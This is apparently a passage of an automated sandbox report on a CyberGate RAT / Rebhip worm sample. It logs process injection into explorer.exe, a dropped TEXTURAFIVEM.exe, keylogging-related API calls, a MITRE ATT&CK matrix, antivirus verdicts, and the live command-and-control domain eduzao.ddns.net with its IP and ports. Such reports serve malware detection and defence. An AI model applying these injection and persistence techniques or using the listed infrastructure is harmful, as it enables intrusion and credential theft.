            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5B60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5B70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5B80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5B90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5BC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe1_2_0040B3C0
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe1_2_0040B3C0
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe1_2_0040B3C0
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: GetLastError,CloseHandle,CloseHandle,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA, explorer.exe1_2_0040B7FC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe4_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe4_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe4_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: GetLastError,CloseHandle,CloseHandle,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA, explorer.exe4_2_0040B7FC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe5_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe5_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe5_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: GetLastError,CloseHandle,CloseHandle,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA, explorer.exe5_2_0040B7FC
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe9_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe9_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: CreateProcessA,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,ExitProcess,CreateProcessA, explorer.exe9_2_0040B3C0
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: GetLastError,CloseHandle,CloseHandle,FindWindowA,GetWindowThreadProcessId,OpenProcess,CreateProcessA, explorer.exe9_2_0040B7FC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24044968 keybd_event,keybd_event,20_2_24044968
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2401544E mouse_event,20_2_2401544E
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe' Jump to behavior
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: Shell_TrayWndSV
            Source: explorer.exe, 00000014.00000002.632181985.0000000006576000.00000004.00000001.sdmpBinary or memory string: Program Manager
            Source: TEXTURAFIVEM.exe, explorer.exe, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.610917551.0000000003F00000.00000002.00000001.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.612946669.0000000003ED0000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.621976402.0000000003810000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000002.611367591.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.613041242.00000000039A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.611307040.0000000003FD0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.610917551.0000000003F00000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.612946669.0000000003ED0000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.621976402.0000000003810000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: ProgMan
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: deskicoblockProgMan
            Source: explorer.exe, 00000014.00000002.632181985.0000000006576000.00000004.00000001.sdmpBinary or memory string: Program Manager+
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: ProgManS
            Source: dqH3t8JU1x.exe, 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmpBinary or memory string: explorer.exeexplorer.exeshell_traywndopenU
            Source: explorer.exe, 00000002.00000002.611367591.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.613041242.00000000039A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.611307040.0000000003FD0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.610917551.0000000003F00000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.612946669.0000000003ED0000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.621976402.0000000003810000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: explorer.exe, 00000002.00000002.611367591.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.613041242.00000000039A0000.00000002.00000001.sdmp, explorer.exe, 00000015.00000002.611307040.0000000003FD0000.00000002.00000001.sdmp, explorer.exe, 00000016.00000002.610917551.0000000003F00000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.612946669.0000000003ED0000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.621976402.0000000003810000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: TEXTURAFIVEM.exe, 00000004.00000002.517664682.00000000007AA000.00000004.00000020.sdmpBinary or memory string: shell_traywndsole
            Source: explorer.exe, 00000014.00000002.631493178.00000000064B1000.00000004.00000001.sdmpBinary or memory string: Program Manageret
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSysPagerS
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: 4shell_traywnd
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSysPagerjh
            Source: explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: btnstartblockButtonShell_TrayWnd
            Source: explorer.exe, 00000014.00000002.631493178.00000000064B1000.00000004.00000001.sdmpBinary or memory string: Program ManageretI
            Source: dqH3t8JU1x.exe, 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, explorer.exe, 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: Shell_TrayWndU
            Source: dqH3t8JU1x.exe, 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmpBinary or memory string: _PERSISTShell_TrayWndexplorer.exeU
            Source: explorer.exe, 00000014.00000002.632181985.0000000006576000.00000004.00000001.sdmpBinary or memory string: Program Manager{
            Source: TEXTURAFIVEM.exe, explorer.exe, explorer.exe, 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, explorer.exe, 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmpBinary or memory string: shell_traywnd
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,20_2_240147A8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoA,20_2_24018CD0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetKeyboardLayoutNameA,GetLocaleInfoA,GetLocaleInfoA,20_2_24018DE0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoA,20_2_24018F80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24016910 GetLocalTime,20_2_24016910
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040555C GetUserNameA,GetUserNameA,1_2_0040555C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040822C RasEnumEntriesA,GetVersionExA,SHGetSpecialFolderPathA,SHGetSpecialFolderPathA,RasGetEntryDialParamsA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,1_2_0040822C

            Stealing of Sensitive Information:

            barindex
            Yara detected CyberGate RATShow sources
            Source: Yara matchFile source: 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TEXTURAFIVEM.exe PID: 5432, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TEXTURAFIVEM.exe PID: 4024, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TEXTURAFIVEM.exe PID: 6984, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dqH3t8JU1x.exe PID: 6776, type: MEMORY
            Source: Yara matchFile source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Replication Through Removable Media1Native API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture131System Time Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsService Execution12Windows Service12Access Token Manipulation1Obfuscated Files or Information21LSASS MemoryPeripheral Device Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Registry Run Keys / Startup Folder21Windows Service12Software Packing11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesInput Capture131Automated ExfiltrationApplication Layer Protocol21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Process Injection722Masquerading221NTDSSystem Service Discovery1Distributed Component Object ModelClipboard Data2Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder21Virtualization/Sandbox Evasion151LSA SecretsFile and Directory Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection722DCSyncQuery Registry1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSecurity Software Discovery341Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowProcess Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingVirtualization/Sandbox Evasion151Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureApplication Window Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
            Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Owner/User Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
            Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskMasquerade Task or ServiceGUI Input CaptureRemote System Discovery1Exploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 388215 Sample: dqH3t8JU1x.exe Startdate: 15/04/2021 Architecture: WINDOWS Score: 100 47 eduzao.ddns.net 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 7 other signatures 2->55 11 dqH3t8JU1x.exe 5 4 2->11         started        signatures3 process4 file5 43 C:\Windows\install\TEXTURAFIVEM.exe, PE32 11->43 dropped 45 C:\...\TEXTURAFIVEM.exe:Zone.Identifier, ASCII 11->45 dropped 75 Creates an undocumented autostart registry key 11->75 77 Contain functionality to detect virtual machines 11->77 79 Contains functionality to inject threads in other processes 11->79 81 7 other signatures 11->81 15 explorer.exe 3 11->15 injected 17 explorer.exe 11->17         started        signatures6 process7 process8 19 TEXTURAFIVEM.exe 15->19         started        22 TEXTURAFIVEM.exe 15->22         started        24 TEXTURAFIVEM.exe 15->24         started        26 WerFault.exe 17->26         started        signatures9 57 Antivirus detection for dropped file 19->57 59 Multi AV Scanner detection for dropped file 19->59 61 Machine Learning detection for dropped file 19->61 73 2 other signatures 19->73 28 explorer.exe 2 5 19->28         started        63 Injects code into the Windows Explorer (explorer.exe) 22->63 65 Writes to foreign memory regions 22->65 67 Allocates memory in foreign processes 22->67 31 explorer.exe 22->31         started        69 Creates a thread in another existing process (thread injection) 24->69 71 Injects a PE file into a foreign processes 24->71 33 explorer.exe 24->33         started        process10 signatures11 83 Contains functionality to inject threads in other processes 28->83 85 Drops executables to the windows directory (C:\Windows) and starts them 28->85 87 Contains functionality to inject code into remote processes 28->87 35 TEXTURAFIVEM.exe 8 28->35         started        37 WerFault.exe 31->37         started        39 WerFault.exe 33->39         started        process12 process13 41 WerFault.exe 23 9 35->41         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            dqH3t8JU1x.exe90%VirustotalBrowse
            dqH3t8JU1x.exe100%ReversingLabsWin32.Worm.Rebhip
            dqH3t8JU1x.exe100%AviraWORM/Rebhip.V
            dqH3t8JU1x.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Windows\install\TEXTURAFIVEM.exe100%AviraWORM/Rebhip.V
            C:\Windows\install\TEXTURAFIVEM.exe100%Joe Sandbox ML
            C:\Windows\install\TEXTURAFIVEM.exe100%ReversingLabsWin32.Worm.Rebhip

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            25.2.TEXTURAFIVEM.exe.400000.0.unpack100%AviraWORM/Rebhip.YDownload File
            4.2.TEXTURAFIVEM.exe.24010000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.dqH3t8JU1x.exe.400000.0.unpack100%AviraWORM/Rebhip.YDownload File
            5.0.TEXTURAFIVEM.exe.400000.0.unpack100%AviraWORM/Rebhip.VDownload File
            20.2.explorer.exe.24010000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.dqH3t8JU1x.exe.24010000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            25.0.TEXTURAFIVEM.exe.400000.0.unpack100%AviraWORM/Rebhip.VDownload File
            4.2.TEXTURAFIVEM.exe.400000.0.unpack100%AviraWORM/Rebhip.YDownload File
            9.2.TEXTURAFIVEM.exe.24160000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.dqH3t8JU1x.exe.400000.0.unpack100%AviraWORM/Rebhip.VDownload File
            30.2.explorer.exe.24010000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.2.TEXTURAFIVEM.exe.24080000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.0.TEXTURAFIVEM.exe.400000.0.unpack100%AviraWORM/Rebhip.VDownload File
            5.2.TEXTURAFIVEM.exe.400000.0.unpack100%AviraWORM/Rebhip.YDownload File
            5.2.TEXTURAFIVEM.exe.240f0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            9.2.TEXTURAFIVEM.exe.24010000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            9.2.TEXTURAFIVEM.exe.400000.0.unpack100%AviraWORM/Rebhip.YDownload File
            5.2.TEXTURAFIVEM.exe.24010000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            22.2.explorer.exe.24010000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            21.2.explorer.exe.24080000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.dqH3t8JU1x.exe.24080000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            9.0.TEXTURAFIVEM.exe.400000.0.unpack100%AviraWORM/Rebhip.VDownload File

            Domains

            SourceDetectionScannerLabelLink
            eduzao.ddns.net0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            eduzao.ddns.net:70000%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            eduzao.ddns.net:44000%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            eduzao.ddns.net:22000%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            eduzao.ddns.net:20200%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            eduzao.ddns.net
            		181.220.140.205
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            eduzao.ddns.net:7000true
            • Avira URL Cloud: safe
            		unknown
            eduzao.ddns.net:4400true
            • Avira URL Cloud: safe
            		unknown
            eduzao.ddns.net:2200true
            • Avira URL Cloud: safe
            		unknown
            eduzao.ddns.net:2020true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
